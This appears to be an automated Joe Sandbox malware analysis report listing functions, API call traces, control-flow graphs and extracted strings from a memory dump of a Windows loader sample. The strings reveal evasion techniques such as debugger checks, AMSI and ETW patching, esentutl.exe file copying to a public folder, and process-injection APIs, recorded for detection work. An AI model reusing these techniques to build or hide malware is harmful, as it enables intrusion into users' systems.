                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: PathString$AllocDeleteFileFreeNameName_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1530111750-0
                                                                                                                  • Opcode ID: 66a4a3a4823cf7049789eae3ca951f846f0146a4fb19272d5dcc8bbded89c83b
                                                                                                                  • Instruction ID: af9d69ab82114b9e8ef285d9bb1cec7df01d799a0ad4891b53d89aa00e2aabc6
                                                                                                                  • Opcode Fuzzy Hash: 66a4a3a4823cf7049789eae3ca951f846f0146a4fb19272d5dcc8bbded89c83b
                                                                                                                  • Instruction Fuzzy Hash: A701F47194030DBEEB11EBA0DD56FCDB3BDEB48700F9145E1E605E6590EA74AB088A64
                                                                                                                  Function 02B26DC8 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B26D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02B26DB9,?,?,?,00000000), ref: 02B26D99
                                                                                                                  • CoCreateInstance.OLE32(?,00000000,00000005,02B26EAC,00000000,00000000,02B26E2B,?,00000000,02B26E9B), ref: 02B26E17
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFromInstanceProg
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2151042543-0
                                                                                                                  • Opcode ID: 65475bca08fe62d4683997fa76f9561573564cbccf2fd98dd4fa29a6a45e5e62
                                                                                                                  • Instruction ID: 65ce6676ed6112fabea7441798b2c83f6ccd0f2f1b98e0c1ec686466d75e23e9
                                                                                                                  • Opcode Fuzzy Hash: 65475bca08fe62d4683997fa76f9561573564cbccf2fd98dd4fa29a6a45e5e62
                                                                                                                  • Instruction Fuzzy Hash: 9B01F231608708AEF711EF61DC6296FBBBDE749B00B9108B5F409E2690EA309D14C964
                                                                                                                  Function 02B2F7C8 Relevance: 227.8, APIs: 8, Strings: 117, Instructions: 9071COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • InetIsOffline.URL(00000000,00000000,02B3B784,?,?,?,00000000,00000000), ref: 02B2F801
                                                                                                                    • Part of subcall function 02B289D0: FreeLibrary.KERNEL32(75380000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,75380000,00000000,00000000), ref: 02B28AAA
                                                                                                                    • Part of subcall function 02B2F6E8: GetModuleHandleW.KERNEL32(KernelBase,?,02B2FAEB,UacInitialize,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,Initialize), ref: 02B2F6EE
                                                                                                                    • Part of subcall function 02B2F6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B2F700
                                                                                                                    • Part of subcall function 02B2F744: GetModuleHandleW.KERNEL32(KernelBase), ref: 02B2F754
                                                                                                                    • Part of subcall function 02B2F744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B2F766
                                                                                                                    • Part of subcall function 02B2F744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B2F77D
                                                                                                                    • Part of subcall function 02B17E5C: GetFileAttributesA.KERNEL32(00000000,?,02B3041F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,UacInitialize), ref: 02B17E67
                                                                                                                    • Part of subcall function 02B1C364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C8B8B8,?,02B30751,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession), ref: 02B1C37B
                                                                                                                    • Part of subcall function 02B2DD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B2DE40), ref: 02B2DDAB
                                                                                                                    • Part of subcall function 02B2DD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B2DE40), ref: 02B2DDDB
                                                                                                                    • Part of subcall function 02B2DD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B2DDF0
                                                                                                                    • Part of subcall function 02B2DD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B2DE1C
                                                                                                                    • Part of subcall function 02B2DD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B2DE25
                                                                                                                    • Part of subcall function 02B17E80: GetFileAttributesA.KERNEL32(00000000,?,02B3356F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,Initialize), ref: 02B17E8B
                                                                                                                    • Part of subcall function 02B18048: CreateDirectoryA.KERNEL32(00000000,00000000,?,02B3370D,OpenSession,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,Initialize,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8), ref: 02B18055
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
                                                                                                                  • String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                                                  • API String ID: 297057983-2644593349
                                                                                                                  • Opcode ID: 36583ab9758dabbdb91b968e4c22a5d8d4647018fd31f8616ae047bb8743ca87
                                                                                                                  • Instruction ID: 9a6282fd7272a6d13b30a3fed263af012b6cc06ab7deb173e0043bc1b8e8e5f7
                                                                                                                  • Opcode Fuzzy Hash: 36583ab9758dabbdb91b968e4c22a5d8d4647018fd31f8616ae047bb8743ca87
                                                                                                                  • Instruction Fuzzy Hash: 5A14E875A0416C8FDB11EB64DD80ACE73FAFF85304F9041E6E149EB228DA30AE959F51
                                                                                                                  Function 02B38128 Relevance: 162.0, APIs: 5, Strings: 86, Instructions: 2778processthreadCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 4574 2b38128-2b38517 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b148ec 4689 2b393a1-2b39524 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b148ec 4574->4689 4690 2b3851d-2b386f0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b147ec call 2b149a0 call 2b14d74 call 2b14df0 CreateProcessAsUserW 4574->4690 4779 2b39cf5-2b3b2fa call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 * 16 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b27c10 call 2b28338 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 ExitProcess 4689->4779 4780 2b3952a-2b39539 call 2b148ec 4689->4780 4799 2b386f2-2b38769 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 4690->4799 4800 2b3876e-2b38879 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 4690->4800 4780->4779 4788 2b3953f-2b39812 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b2f094 call 2b14860 call 2b149a0 call 2b146d4 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b17e5c 4780->4788 5046 2b39818-2b39aea call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b2e358 call 2b14530 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14de0 * 2 call 2b14764 call 2b2dc8c 4788->5046 5047 2b39aef-2b39cf0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b149f8 call 2b28d70 4788->5047 4799->4800 4900 2b38880-2b38ba0 call 2b149f8 call 2b2de50 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b2d164 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 4800->4900 4901 2b3887b-2b3887e 4800->4901 5217 2b38ba2-2b38bb4 call 2b28730 4900->5217 5218 2b38bb9-2b3939c call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 ResumeThread call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 CloseHandle call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b28080 call 2b2894c * 6 CloseHandle call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 4900->5218 4901->4900 5046->5047 5047->4779 5217->5218 5218->4689
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B289D0: FreeLibrary.KERNEL32(75380000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,75380000,00000000,00000000), ref: 02B28AAA
                                                                                                                  • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02C8B7E0,02C8B824,OpenSession,02B97380,02B3B7B8,UacScan,02B97380), ref: 02B386E9
                                                                                                                  • ResumeThread.KERNEL32(00000000,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8), ref: 02B38D33
                                                                                                                  • CloseHandle.KERNEL32(00000000,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,00000000,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380), ref: 02B38EB2
                                                                                                                    • Part of subcall function 02B2894C: LoadLibraryW.KERNEL32(bcrypt,?,0000086C,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,UacScan), ref: 02B28960
                                                                                                                    • Part of subcall function 02B2894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B2897A
                                                                                                                    • Part of subcall function 02B2894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,0000086C,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize), ref: 02B289B6
                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02B97380,02B3B7B8,UacInitialize,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,UacScan,02B97380), ref: 02B392A4
                                                                                                                    • Part of subcall function 02B17E5C: GetFileAttributesA.KERNEL32(00000000,?,02B3041F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,UacInitialize), ref: 02B17E67
                                                                                                                    • Part of subcall function 02B2DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B2DD5E), ref: 02B2DCCB
                                                                                                                    • Part of subcall function 02B2DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B2DD05
                                                                                                                    • Part of subcall function 02B2DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B2DD32
                                                                                                                    • Part of subcall function 02B2DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B2DD3B
                                                                                                                    • Part of subcall function 02B28338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B283C2), ref: 02B283A4
                                                                                                                  • ExitProcess.KERNEL32(00000000,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,Initialize,02B97380,02B3B7B8,00000000,00000000,00000000,ScanString,02B97380,02B3B7B8), ref: 02B3B2FA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseFileLibrary$CreateFreeHandlePathProcess$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcResumeThreadUserWrite
                                                                                                                  • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                  • API String ID: 2769005614-3738268246
                                                                                                                  • Opcode ID: a15f24f87ca8209a4eb38191566a1fbacc7f49310c7b190f1f1266dea5896fda
                                                                                                                  • Instruction ID: 760498d1fe16e215b833af70e46a3420b66f908e4c86cba675ec3650dbe8bc54
                                                                                                                  • Opcode Fuzzy Hash: a15f24f87ca8209a4eb38191566a1fbacc7f49310c7b190f1f1266dea5896fda
                                                                                                                  • Instruction Fuzzy Hash: DB43FC79A0422CCFDB11EB64DD809CE73FAEF85344F9041E5E149EB228DA30AE959F51
                                                                                                                  Function 02B33E12 Relevance: 41.8, APIs: 3, Strings: 23, Instructions: 2804sleepCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B289D0: FreeLibrary.KERNEL32(75380000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,75380000,00000000,00000000), ref: 02B28AAA
                                                                                                                    • Part of subcall function 02B2DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B2DD5E), ref: 02B2DCCB
                                                                                                                    • Part of subcall function 02B2DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B2DD05
                                                                                                                    • Part of subcall function 02B2DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B2DD32
